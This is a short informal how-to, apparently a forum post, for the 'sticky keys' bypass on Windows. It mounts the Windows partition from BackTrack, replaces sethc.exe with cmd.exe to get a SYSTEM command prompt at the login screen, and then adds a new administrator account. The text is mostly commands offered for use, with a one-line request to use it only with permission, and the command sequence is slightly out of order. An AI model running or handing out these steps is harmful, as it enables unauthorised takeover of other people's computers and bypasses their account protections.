This is a very easy crack, allowing you to open a windows command prompt with system privileges at log-in. shouldn't take more than 3 minutes. It replaces sethc.exe which can be invoked at start-up by pressing shift five times (something to do with contrast) with cmd.exe: Since you haven't logged in yet it opens a command prompt with system privileges (runs in backtrack).
To make a new admin that you can login to (apart from EVERYTHING else that you can do) use the following commands (replace admin with the username and pass with your password)
mount -t captive-ntfs /dev/hda1 /mnt/ntfs
mv sethc.exe sethc.old; cp cmd.exe sethc.exe
shutdown –r now
reboot and you're done.
NET USER admin pass /add
NET LOCALGROUP administrators admin /add
No need to bother with cracking people's passwords (god forbid, this may take years, as with mine).
(please only use on your own computer or with other people's permission)